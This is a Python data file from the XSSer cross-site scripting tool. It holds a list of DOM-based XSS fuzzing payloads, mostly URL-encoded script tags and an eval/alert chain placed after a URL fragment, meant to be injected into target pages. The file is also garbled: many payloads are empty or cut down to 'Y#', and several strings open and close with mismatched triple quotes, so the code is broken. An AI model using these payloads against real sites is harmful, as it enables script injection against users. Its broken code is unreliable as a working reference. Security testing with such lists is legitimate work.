#!/usr/bin/env python # -*- coding: utf-8 -*-" # vim: set expandtab tabstop=4 shiftwidth=4: """ This file is part of the XSSer project, https://xsser.03c8.net Copyright (c) 2010/2020 | psy xsser is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 3 of the License. xsser is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with xsser; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ ## This file contains different XSS fuzzing vectors. ## If you have some new, please email me to [epsylon@riseup.net] ## Happy Cross Hacking! ;) DOMvectors = [ # { 'payload' : """?notname=PAYLOAD&""", # 'browser' : """[Document Object Model Injection]"""}, # { 'payload':''' ''', # 'browser' : """[Document Object Model Injection]"""}, # { 'payload' : """?""", # 'browser' : """[Document Object Model Injection]"""}, # { 'payload' : """?name=Y%0d%0a%0d%0aPAYLOAD""", # 'browser' : """[Document Object Model Injection]"""}, # { 'payload' : """?foobar=name=PAYLOAD&""", # 'browser' : """[Document Object Model Injection]"""}, { 'payload':"""Y#""", 'browser':"""[Document Object Model Injection]"""}, { 'payload':"""Y#<%""", 'browser':"""[Document Object Model Injection]"""}, { 'payload':"""Y#''', 'browser':"""[Document Object Model Injection]"""}, { 'payload':"""Y#""", 'browser':"""[Document Object Model Injection]"""}, { 'payload':"""Y#a=eval;b=alert;a(b(/ PAYLOAD/.source));'">''', 'browser':"""[Document Object Model Injection]"""}, { 'payload':'''Y#''', 'browser':"""[Document Object Model Injection]"""}, { 'payload':'''Y#%00“>''', 'browser':"""[Document Object Model Injection]"""}, { 'payload':'''Y#%22%3E%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''', 'browser':"""[Document Object Model Injection]"""}, { 'payload':'''Y#%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''', 'browser':"""[Document Object Model Injection]"""}, { 'payload':'''Y#`"><%3Cscript>javascript:alert(PAYLOAD)''', 'browser':"""[Document Object Model Injection]"""}, { 'payload':'''Y#%3Cscript>javascript:alert(PAYLOAD)''', 'browser':"""[Document Object Model Injection]"""}, { 'payload':"""Y#""", 'browser':"""[Document Object Model Injection]"""} ]